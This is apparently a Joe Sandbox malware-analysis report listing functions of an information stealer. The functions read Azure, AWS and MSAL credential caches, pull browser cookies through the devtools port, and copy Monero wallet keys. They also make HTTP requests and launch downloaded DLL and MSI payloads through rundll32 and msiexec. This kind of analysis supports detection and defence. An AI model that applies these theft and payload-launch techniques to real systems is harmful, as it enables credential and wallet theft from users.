Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
Instruction ID: 2ffef9a5ff27d15fdfcde931bb0eed231ed1230d683cb509dda854d4c3bded9d
Opcode Fuzzy Hash: 1171867759ab89ade8fb7c755c7fa5c9c7194ff520f7ab7c6ea4a9a29ee5e94d
Instruction Fuzzy Hash: 2E814D71911228ABDB24DB54DD95FEAB7B8BF08700F1486D8F10AB6140DF356B84CFA0

Function 00E291A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E291FC

Strings

`d, xrefs: 00E291CF, 00E29399, 00E291D2, 00E2939C
`d, xrefs: 00E29361, 00E293D9, 00E2930E, 00E292DF, 00E292B2, 00E2920D, 00E291E4, 00E29364
image/jpeg, xrefs: 00E292C6

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `d$`d$image/jpeg
API String ID: 2244384528-3402243820
Opcode ID: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
Instruction ID: 05046da780f2df1c6af0f39bea6ca81dae0e2eb2fa2019032268b48eefb3a7fe
Opcode Fuzzy Hash: 75a2c062804eda6022ab88d66a88a527b98bca98fe7f725cffddc4c8eed43a3a
Instruction Fuzzy Hash: F4711071900218EBDB14DFE5E885FEEB7B9BF48700F109548F656AB284DB35E944CB60

Function 00E24FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B

lstrcat.KERNEL32(?,00000000), ref: 00E25000
lstrcat.KERNEL32(?,\.azure\), ref: 00E2501D

Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93

lstrcat.KERNEL32(?,00000000), ref: 00E2508C
lstrcat.KERNEL32(?,\.aws\), ref: 00E250A9

Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2

lstrcat.KERNEL32(?,00000000), ref: 00E25118
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E25135

Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C00
Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E308D3), ref: 00E24C15
Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24C32
Part of subcall function 00E24B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24C6E
Part of subcall function 00E24B60: lstrcat.KERNEL32(?,0099FA50), ref: 00E24C9A
Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE0), ref: 00E24CAC
Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CC0
Part of subcall function 00E24B60: lstrcat.KERNEL32(?,00E30FE4), ref: 00E24CD2
Part of subcall function 00E24B60: lstrcat.KERNEL32(?,?), ref: 00E24CE6
Part of subcall function 00E24B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24CFC
Part of subcall function 00E24B60: DeleteFileA.KERNEL32(?), ref: 00E24D81

Strings

*.*, xrefs: 00E25028
Azure\.aws, xrefs: 00E250AF
*.*, xrefs: 00E250B4
Azure\.azure, xrefs: 00E25023
\.azure\, xrefs: 00E25011
\.IdentityService\, xrefs: 00E25129
Azure\.IdentityService, xrefs: 00E2513B
msal.cache, xrefs: 00E25140
\.aws\, xrefs: 00E2509D

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 2deeb90e3737f0be2b5be32d9486ecbb7b68238e0cbdc9916f80e38eb6a5449a
Instruction ID: cb5ec671e201afab5255a8df444936e012f175517f5178485d63296595728dbc
Opcode Fuzzy Hash: 2deeb90e3737f0be2b5be32d9486ecbb7b68238e0cbdc9916f80e38eb6a5449a
Instruction Fuzzy Hash: D541E7BAA4031867DB24F770ED5BFDD37689B50700F405898B689750C1EEB557C8CB92

Function 00E23080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00E23415
ShellExecuteEx.SHELL32(0000003C), ref: 00E235AD
ShellExecuteEx.SHELL32(0000003C), ref: 00E2373A

Strings

.msi, xrefs: 00E235E8
"" , xrefs: 00E232EA
/passive, xrefs: 00E236AB
C:\Windows\system32\msiexec.exe, xrefs: 00E2370F
.dll, xrefs: 00E23435
<, xrefs: 00E236E0
/i ", xrefs: 00E23634
C:\Windows\system32\rundll32.exe, xrefs: 00E23582

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
Instruction ID: 1871503af8ba9184227012bd485b55766135ffdf3db5ab13630afc6fe7099632
Opcode Fuzzy Hash: 6ac1093450bc7c74201788577db4549bcbe3cb2909fa5bde860c90c056cc1d9c
Instruction Fuzzy Hash: 10120E719101289BCB14EBA0EDA2FEEB7B9AF14300F4855A9F50776191EF342B49CF61

Function 00E19BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E19A50: InternetOpenA.WININET(00E30AF6,00000001,00000000,00000000,00000000), ref: 00E19A6A

lstrcat.KERNEL32(?,cookies), ref: 00E19CAF
lstrcat.KERNEL32(?,00E312C4), ref: 00E19CC1
lstrcat.KERNEL32(?,?), ref: 00E19CD5
lstrcat.KERNEL32(?,00E312C8), ref: 00E19CE7
lstrcat.KERNEL32(?,?), ref: 00E19CFB
lstrcat.KERNEL32(?,.txt), ref: 00E19D0D
lstrlen.KERNEL32(00000000), ref: 00E19D17
lstrlen.KERNEL32(00000000), ref: 00E19D26

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Strings

.txt, xrefs: 00E19D01
cookies, xrefs: 00E19CA3
localhost, xrefs: 00E19BF5
ws://localhost:9229, xrefs: 00E19C3C
/devtools, xrefs: 00E19C0B

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$InternetOpenlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 3174675846-3542011879
Opcode ID: bee00b789f56c9cdbe5a6072352833883b04e68d29513af6cffa45beb6f49b9c
Instruction ID: 8a99f76d3474850792f9e35212208d5bb0b78494d15645e600e569f62389a3cd
Opcode Fuzzy Hash: bee00b789f56c9cdbe5a6072352833883b04e68d29513af6cffa45beb6f49b9c
Instruction Fuzzy Hash: EA5185719106089BDB14EBE0DC55FEE7778AF14701F405598F105B7095EF355A88CFA1

Function 00E25510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E162D0: InternetOpenA.WININET(00E30DFF,00000001,00000000,00000000,00000000), ref: 00E16331
Part of subcall function 00E162D0: StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E16353
Part of subcall function 00E162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16385
Part of subcall function 00E162D0: HttpOpenRequestA.WININET(00000000,GET,?,0099F2D8,00000000,00000000,00400100,00000000), ref: 00E163D5
Part of subcall function 00E162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E1640F
Part of subcall function 00E162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E16421

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25568
lstrlen.KERNEL32(00000000), ref: 00E2557F

Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 00E255B4
lstrlen.KERNEL32(00000000), ref: 00E255D3
lstrlen.KERNEL32(00000000), ref: 00E255FE

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Strings

ERROR, xrefs: 00E2555A
ERROR, xrefs: 00E25682
ERROR, xrefs: 00E256BF
ERROR, xrefs: 00E256F9
ERROR, xrefs: 00E25609

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 05244be645b885674b8f86314ae25055125d011475d621623f46f7350299e582
Instruction ID: 1e03058373e80e30756540f040582a8081173a649d4aa081cb425e3c60e0e8e4
Opcode Fuzzy Hash: 05244be645b885674b8f86314ae25055125d011475d621623f46f7350299e582
Instruction Fuzzy Hash: F0511F709101189BCB18FF64EDA6BED77B9AF10340F586468F90677591DF306B44CB52

Function 00E21520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 9d49105e1ec1f5a92d9e277fa8b5c73941adca1b131bb3b281ab5e8b6ce6a2a2
Instruction ID: 743d9a9a97af8b03f473ea549f4f4aed67e7d6fbf6b6eb9e33cc6a93ea592f72
Opcode Fuzzy Hash: 9d49105e1ec1f5a92d9e277fa8b5c73941adca1b131bb3b281ab5e8b6ce6a2a2
Instruction Fuzzy Hash: 48C184B59001299BCB14EF60EC9AFDE73B9BF64304F0455D8F409B7242DA75AA84CF91

Function 00E244D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B

lstrcat.KERNEL32(?,00000000), ref: 00E2453C
lstrcat.KERNEL32(?,0099F410), ref: 00E2455B
lstrcat.KERNEL32(?,?), ref: 00E2456F
lstrcat.KERNEL32(?,0099DF70), ref: 00E24583

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E28F20: GetFileAttributesA.KERNEL32(00000000,?,00E11B94,?,?,00E3577C,?,?,00E30E22), ref: 00E28F2F

Part of subcall function 00E1A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E1A489

Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

Part of subcall function 00E29550: GlobalAlloc.KERNEL32(00000000,-F,00E2462D), ref: 00E29563

StrStrA.SHLWAPI(?,0099F560), ref: 00E24643
GlobalFree.KERNEL32(?), ref: 00E24762

Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A23F
Part of subcall function 00E1A210: LocalAlloc.KERNEL32(00000040,?,?,?,00E14F3E,00000000,?), ref: 00E1A251
Part of subcall function 00E1A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E1A27A
Part of subcall function 00E1A210: LocalFree.KERNEL32(?,?,?,?,00E14F3E,00000000,?), ref: 00E1A28F

lstrcat.KERNEL32(?,00000000), ref: 00E246F3
StrCmpCA.SHLWAPI(?,00E308D2), ref: 00E24710
lstrcat.KERNEL32(00000000,00000000), ref: 00E24722
lstrcat.KERNEL32(00000000,?), ref: 00E24735
lstrcat.KERNEL32(00000000,00E30FA0), ref: 00E24744

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 19dd4a0c940740679dc3138468c6c144633ee4fbf182c8cc0b9331bfdb9e00ea
Instruction ID: ba69d222bde13bc8bd15ba4b5989a58e5477a2f1453a421254209a07beec32de
Opcode Fuzzy Hash: 19dd4a0c940740679dc3138468c6c144633ee4fbf182c8cc0b9331bfdb9e00ea
Instruction Fuzzy Hash: 4571A6B6900218ABDB14EBA0ED46FEE73B9AF88700F044598F605A7185EB35DB44CF91

Function 00E11310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
Part of subcall function 00E112A0: RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
Part of subcall function 00E112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
Part of subcall function 00E112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
Part of subcall function 00E112A0: RegCloseKey.ADVAPI32(?), ref: 00E112FF

lstrcat.KERNEL32(?,00000000), ref: 00E1134F
lstrlen.KERNEL32(?), ref: 00E1135C
lstrcat.KERNEL32(?,.keys), ref: 00E11377

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E11465

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

DeleteFileA.KERNEL32(00000000), ref: 00E114EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00E11335
.keys, xrefs: 00E1136B
wallet_path, xrefs: 00E11330
